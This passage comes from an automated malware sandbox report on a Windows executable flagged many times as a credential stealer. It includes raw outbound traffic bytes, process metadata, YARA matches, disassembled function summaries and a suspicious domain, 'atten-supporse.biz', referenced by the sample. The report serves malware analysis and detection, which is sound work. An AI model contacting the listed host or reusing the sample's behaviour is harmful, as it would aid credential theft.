fb b1 02 e9 28 74 76 eb 7f 79 e2 4f 34 3c 42 fe 7f 90 d9 59 d0 6f Data Ascii: ~;:XH.rm8kj:[HZG`1=~e2K6IoO2dtICJw-!#:9#\|o!1SI Jx3?1C8/ar10JEH6xsDWguU5uGu?eYZAx6l\ru:(tvyO4<BYo
2024-12-09 21:35:18 UTC	15331	OUT	Data Raw: e5 b5 14 38 bf d1 39 a7 76 c7 c5 3a 34 f8 4f 8f 26 02 2c 5f 6d 2a 4d 98 7b c1 49 39 ad 1a fd 6d 25 7f 0f e1 24 78 cc 2e 72 95 bb 89 a4 50 c8 4c 32 4c 11 e4 85 e7 a7 e4 bb 65 34 6a 12 41 be 28 fe f7 15 f1 d3 2a 68 f0 c1 e8 89 2f 65 6f c4 56 41 ee 88 90 95 18 79 35 c0 b1 56 5d a9 dd e4 0c 9b ed 06 d2 73 af d6 bb eb c8 75 b5 d9 ea 3c 3b 60 db 4d a0 66 21 28 72 f4 b3 0c 8c 46 95 4c 17 58 24 f6 77 24 90 b2 b6 ca 32 a6 b2 2a 80 b7 ea 95 ac 0d 46 ff 1d bc b0 f4 51 92 d4 86 a0 b8 28 20 58 de b2 30 35 26 d8 88 8b 5c 19 d2 fd 14 fd b2 c1 fd 74 b1 37 94 ed ee a3 a5 e0 03 d3 3d 09 33 f2 c5 82 d0 bd 21 52 98 83 e7 9f b6 56 98 c4 43 c4 19 af 06 c2 e8 d2 ab ca e8 3d 04 e3 a6 d6 72 a4 22 14 d7 e4 e0 06 ab dd 75 31 5c c2 2e 8d ad 0d 45 98 d6 07 58 47 08 2f 2e a8 c4 44 76 Data Ascii: 89v:4O&,_mM{I9m%$x.rPL2Le4jA(h/eoVAy5V]su<;`Mf!(rFLX$w$2*FQ( X05&\t7=3!RVC=r"u1\.EXG/.Dv
2024-12-09 21:35:23 UTC	1027	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 21:35:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=54sn4vork2t617sdpe74575o1c; expires=Fri, 04-Apr-2025 15:21:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Whys3IiDnwMM%2BY%2BCWNCfRj7aw6FjIKoveReeHWhGYKWxM%2FHeHcnf9Q7V348ajYN%2B418LD8WfOrdoZJ5M%2BTDmvhQhWv6gp5T9HHjG3Z8tI0kXRHpU81dEnoOErltRalqQG9dyF4E%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef81fd0a9807ca5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1817&min_rtt=1810&rtt_var=693&sent=291&recv=600&lost=0&retrans=0&sent_bytes=2846&recv_bytes=572798&delivery_rate=1562332&cwnd=243&unsent_bytes=0&cid=ca83778ef03667b2&ts=4146&x=0"

Target ID:	0
Start time:	16:34:57
Start date:	09/12/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xc50000
File size:	1'895'424 bytes
MD5 hash:	52F0F216DFBB86683B1E318A0796DD81
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2183576461.000000000173F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2183284410.000000000173F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2155738862.0000000001745000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2184825039.000000000173F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2183365042.000000000173F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2183995653.000000000173F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2183909532.000000000173F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2184609958.000000000173F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2084573871.0000000001745000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2183070027.000000000173F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2184342033.000000000173F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2120532040.0000000001745000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2182875665.000000000173E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2184473776.000000000173F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2156261014.0000000001745000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2183708520.000000000173F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2184119723.000000000173F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2184213865.000000000173F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2183174320.000000000173F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2183492043.000000000173F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2184688562.000000000173E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2183790933.000000000173F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	59.5%
Total number of Nodes:	222
Total number of Limit Nodes:	21

Executed Functions

Function 00C715F0 Relevance: 28.1, Strings: 22, Instructions: 608
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

a, xrefs: 00C71694
x, xrefs: 00C71C64
a, xrefs: 00C71AED
`, xrefs: 00C71699
/, xrefs: 00C71A80
a, xrefs: 00C71D5B
!@, xrefs: 00C71623
c, xrefs: 00C7168A
$, xrefs: 00C71A76
b, xrefs: 00C7168F
=, xrefs: 00C718E5
,, xrefs: 00C71A71
y, xrefs: 00C71C69
?, xrefs: 00C718EF
c, xrefs: 00C71AE3
b, xrefs: 00C71AE8
`, xrefs: 00C71D60
/, xrefs: 00C71A7B
c, xrefs: 00C71D51
`, xrefs: 00C71AF2
,, xrefs: 00C71BCF
b, xrefs: 00C71D56

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: !@$$$,$,$/$/$=$?$`$`$`$a$a$a$b$b$b$c$c$c$x$y
API String ID: 0-2322859148
Opcode ID: e30aed928e2cf561e9c4d82f540615e51f5af2966a9954322990886b10cd818b
Instruction ID: 1fa855289a5fbd8d6a862a91e822375d445be32d3924855d2e696ae21fa5a721
Opcode Fuzzy Hash: e30aed928e2cf561e9c4d82f540615e51f5af2966a9954322990886b10cd818b
Instruction Fuzzy Hash: 2232F37260C3808FD3248B2DC49536FFBE1ABD5314F1D892DE9E987392D6B989458B43

Function 00C86F90 Relevance: 25.1, APIs: 5, Strings: 9, Instructions: 579
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(D080DE8F), ref: 00C871DC
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00C87219
SysFreeString.OLEAUT32(?), ref: 00C87504
SysFreeString.OLEAUT32(?), ref: 00C8750A
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00C87552

Strings

.'(), xrefs: 00C87008, 00C870C1
>C, xrefs: 00C870D7
{.] , xrefs: 00C871A1
{|, xrefs: 00C873BF
C, xrefs: 00C870CF
!", xrefs: 00C871A9
"#$%, xrefs: 00C875FC
.;, xrefs: 00C87282
p*v,, xrefs: 00C87199

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID: String$Free$AllocBlanketInformationProxyVolume
String ID: !"$"#$%$.'()$.;$>C$C$p*v,${.] ${|
API String ID: 1773362589-264043890
Opcode ID: 7acc0089c3999fa1568a23c38b5d994971e206e40d03f948a194d3d3f27deecf
Instruction ID: 6f713bb68674de392f5144b8046fa59f1a890204cf77aba7e9073d3d688f6565
Opcode Fuzzy Hash: 7acc0089c3999fa1568a23c38b5d994971e206e40d03f948a194d3d3f27deecf
Instruction Fuzzy Hash: AE020F7160C3009FD310DF64C881B6BBBE5EBC5308F24892CF6A59B2A1E779D945CB96

Function 00C5E2A9 Relevance: 12.5, APIs: 1, Strings: 7, Instructions: 531
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 00C5E673

Strings

atten-supporse.biz, xrefs: 00C5E649, 00C5E9DD
,, xrefs: 00C5E688
"# `, xrefs: 00C5E70A
s, xrefs: 00C5E736
`~, xrefs: 00C5E8CD
qx, xrefs: 00C5E8EE
I~, xrefs: 00C5E8E3

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID: Uninitialize
String ID: "# `$,$I~$`~$atten-supporse.biz$qx$s
API String ID: 3861434553-3378010734
Opcode ID: 280a2c99af7877ae01ab1079b9b3f7fb2261c9c690eb88c7562d9a3223ba4654
Instruction ID: 85ea52d605edae5f4e0f9cc3fbd822557b0d03ad674fef42e575eb6e2b9591ee
Opcode Fuzzy Hash: 280a2c99af7877ae01ab1079b9b3f7fb2261c9c690eb88c7562d9a3223ba4654
Instruction Fuzzy Hash: 4002DDB410C3D18BD335CF2584A07EBBFE1AF92305F1899ACD8DA5B252D635064A8B67

Function 00C5A960 Relevance: 9.2, Strings: 7, Instructions: 401
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

n, xrefs: 00C5A982
kl, xrefs: 00C5AB2D
N[\D, xrefs: 00C5AC00
'D F, xrefs: 00C5AAC6
A|}~, xrefs: 00C5AAD6
#xDz, xrefs: 00C5AACE
N[\D, xrefs: 00C5ADB7, 00C5ADEE, 00C5AD01, 00C5ACF6, 00C5ABA4, 00C5ABC5, 00C5ACD2, 00C5ADC0

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: #xDz$'D F$A|}~$N[\D$N[\D$kl$n
API String ID: 0-490458541
Opcode ID: 6466994ce0b87e90d17754a2f3ae6fc80c434e76164fa8b0298d3f64a03c1352
Instruction ID: f8ca170a4c2ac0b07b98e5a383ff8a5b8764629d030e897af213db04ca03910f
Opcode Fuzzy Hash: 6466994ce0b87e90d17754a2f3ae6fc80c434e76164fa8b0298d3f64a03c1352
Instruction Fuzzy Hash: 3EC1467660C3504BC724CF2588905AFBBE3ABC1305F1E8A2CE9D54B342C676994EC78B

Function 00C5CE55 Relevance: 9.0, Strings: 7, Instructions: 275
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

atten-supporse.biz, xrefs: 00C5D27A
I@, xrefs: 00C5D0C4
F^, xrefs: 00C5D0B9
EA66A9D61CD77F8D23D904AF30EFEBBC, xrefs: 00C5CEAF
VgfW, xrefs: 00C5CF2F
N~ :, xrefs: 00C5CF45
z@(, xrefs: 00C5CF5B

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: EA66A9D61CD77F8D23D904AF30EFEBBC$F^$I@$N~ :$VgfW$atten-supporse.biz$z@(
API String ID: 0-1503950166
Opcode ID: 87ec4c127d4676faff93d52205a1af541001efd818a73159b32442f5482c751d
Instruction ID: e4b0544f57ab8e09373c889cb3105c8ffe834cc6094de20e498d22cd408cac0d
Opcode Fuzzy Hash: 87ec4c127d4676faff93d52205a1af541001efd818a73159b32442f5482c751d
Instruction Fuzzy Hash: DA91E1B41493C18BD335CF25D490BEBBBE0AB96314F148D6CD8EA4B242D738454ACB56

Function 00C733A0 Relevance: 8.0, Strings: 6, Instructions: 472
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

#R,T, xrefs: 00C73647
ij, xrefs: 00C7397D
$^<P, xrefs: 00C7363F
]~"p, xrefs: 00C7367F
KM, xrefs: 00C737FB
VW, xrefs: 00C733E5

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: #R,T$$^<P$VW$]~"p$ij$KM
API String ID: 0-788320361
Opcode ID: ff79a4db020f8fb4b071c11987ea501251f1fa89dd3ecda16067fd59a114c193
Instruction ID: 0d1c1a03ecf5fdb743ad00bb960a1aa036b2fe970309f593b06f8f435a0a6123
Opcode Fuzzy Hash: ff79a4db020f8fb4b071c11987ea501251f1fa89dd3ecda16067fd59a114c193
Instruction Fuzzy Hash: 66F1DAB16083408FD314DF65D88162FBBE1EF95304F44892DF5AA8B291E778DA4ACB53

Function 00C7BFDA Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 461
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 00C7C0D7
GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 00C7C113
GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 00C7C1D8

Strings

x, xrefs: 00C7C2F2

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID: ComputerName$FreeLibrary
String ID: x
API String ID: 2243422189-2363233923
Opcode ID: 13c6f83e0e476c57b48817d96f4d74f474014ee52ba85bd984abaf33479c0196
Instruction ID: bace56f95d7228d12e2e1f503f06331642cacb619d5e304052604e4ae661d666
Opcode Fuzzy Hash: 13c6f83e0e476c57b48817d96f4d74f474014ee52ba85bd984abaf33479c0196
Instruction Fuzzy Hash: D4D1B36060C7D18ED7358B3984903BBBBD1AFE7344F5889ADD0D99B282D7398509CB53

Function 00C86C40 Relevance: 6.5, Strings: 5, Instructions: 265
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

b, xrefs: 00C86ED0
c, xrefs: 00C86ECC
`, xrefs: 00C86ED8
cba`cba`, xrefs: 00C86DDF
a, xrefs: 00C86ED4

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: `$a$b$c$cba`cba`
API String ID: 0-3925122358
Opcode ID: 81a9a1b95515452819c8c6c9cd5bb85d39162a4f17e092e4a78224dddb4a0021
Instruction ID: 1ca8ffcd3922bfe1eaf72250dd43f45b7407153cf9f3f5771cd90e87d10e923c
Opcode Fuzzy Hash: 81a9a1b95515452819c8c6c9cd5bb85d39162a4f17e092e4a78224dddb4a0021
Instruction Fuzzy Hash: 3BA15871E08354CFDB04DBADD4553AEBFF2AB95308F18806ED486A7392C679C900CB96

Function 00C5C36E Relevance: 6.5, Strings: 5, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CJ, xrefs: 00C5C67E
4cde, xrefs: 00C5C79C
F'k), xrefs: 00C5C706
GS, xrefs: 00C5C677
){+}, xrefs: 00C5C788

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: ){+}$4cde$CJ$F'k)$GS
API String ID: 0-4192230409
Opcode ID: 6c24714162b113239f7aa2bcd5a21c64ff2fac9590910f322828e433d867bcb8
